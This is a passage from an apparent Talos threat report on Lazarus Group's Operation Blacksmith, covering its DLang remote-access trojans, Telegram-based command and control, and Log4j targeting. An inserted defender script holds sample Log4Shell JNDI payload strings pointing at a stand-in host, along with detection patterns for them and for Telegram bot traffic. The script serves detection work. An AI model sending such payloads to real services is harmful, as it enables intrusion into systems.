Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

Cisco Talos recently discovered a new campaign conducted by the Lazarus Group that we’re calling “Operation Blacksmith.” It employs at least three new DLang-based malware families, two of which are remote access trojans (RATs); one of these RATs uses Telegram bots and channels as its medium for command and control (C2) communications. We track the Telegram-based RAT as “NineRAT,” the non-Telegram-based RAT as “DLRAT,” and the DLang-based downloader as “BottomLoader.”

Our latest findings indicate a definitive shift in the tactics of the North Korean APT group Lazarus Group. Over the past year and a half, Talos has disclosed three different RATs built with technologies that are uncommon in malware development: QtFramework, PowerBasic and, now, DLang.

Talos has observed that the tactics, techniques and procedures (TTPs) in this Lazarus campaign overlap with those of the North Korean state-sponsored group Onyx Sleet (PLUTONIUM), also known as the Andariel APT group. Andariel is widely considered to be an APT sub-group under the Lazarus umbrella. The campaign consists of continued opportunistic targeting of enterprises worldwide that publicly host and expose vulnerable infrastructure to n-day exploitation, such as CVE-2021-44228 (Log4j). We have observed Lazarus target manufacturing, agricultural and physical security companies.
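A defender-side starting point for the two indicators this summary names, exploitation attempts against exposed Log4j services and server hosts talking to the Telegram Bot API, as an added example that is not part of the Talos report. The log lines are constructed, and the access-log and proxy-log formats are assumptions:

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not from the Talos report): web-server access log entries,
# one with a plain and one with a URL-encoded JNDI lookup string, plus proxy entries
# in an assumed "key=value" format showing outbound traffic from server hosts.
SAMPLE_LOGS = [
    '10.0.0.5 - - [01/Dec/2023:10:00:00 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Dec/2023:10:00:01 +0000] "GET /api HTTP/1.1" 200 98 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '10.0.0.5 - - [01/Dec/2023:10:00:02 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fx%7D HTTP/1.1" 404 0 "-" "curl/8.0"',
    'proxy 2023-12-01T10:05:00Z src=10.0.0.22 host=api.telegram.org path=/botPLACEHOLDER_TOKEN/getUpdates',
    'proxy 2023-12-01T10:06:00Z src=10.0.0.23 host=www.example.com path=/index.html',
]

# A lookup string of the form ${jndi:<scheme>:...}; matched case-insensitively after URL-decoding.
# Nested-lookup obfuscation is not normalised here and would need a fuller decoder.
JNDI_RE = re.compile(r"\$\{[^}]*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop)\b", re.IGNORECASE)

# Telegram Bot API calls have the public shape https://api.telegram.org/bot<token>/<method>.
TELEGRAM_RE = re.compile(r"src=(\S+)\s+host=api\.telegram\.org\s+path=/bot[^/\s]+/(\w+)")


def find_log4shell_attempts(lines):
    """Return (raw_line, jndi_scheme) for every line carrying a JNDI lookup string."""
    hits = []
    for line in lines:
        # Two decoding rounds so a double-encoded request does not slip past the regex.
        decoded = unquote(unquote(line))
        match = JNDI_RE.search(decoded)
        if match:
            hits.append((line, match.group(1).lower()))
    return hits


def find_telegram_bot_api(lines, server_prefix="10.0.0."):
    """Return (source_host, bot_method) for server hosts calling the Telegram Bot API.

    Servers rarely have a legitimate reason to poll a bot channel, so each hit is a
    candidate for the Telegram-based C2 behaviour described in the report.
    """
    hits = []
    for line in lines:
        match = TELEGRAM_RE.search(line)
        if match and match.group(1).startswith(server_prefix):
            hits.append((match.group(1), match.group(2)))
    return hits


if __name__ == "__main__":
    for raw, scheme in find_log4shell_attempts(SAMPLE_LOGS):
        print(f"[log4shell:{scheme}] {raw}")
    for src, method in find_telegram_bot_api(SAMPLE_LOGS):
        print(f"[telegram-bot-api] {src} -> {method}")
```

The Telegram check is a hunting heuristic, not a verdict: confirm a hit by inspecting the process on the source host and the full request stream rather than the host name alone.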

Lazarus Group’s Operation Blacksmith compromised the manufacturing, agriculture and physical security sectors

Operation Blacksmith involved the exploitation of CVE-2021-44228, also known as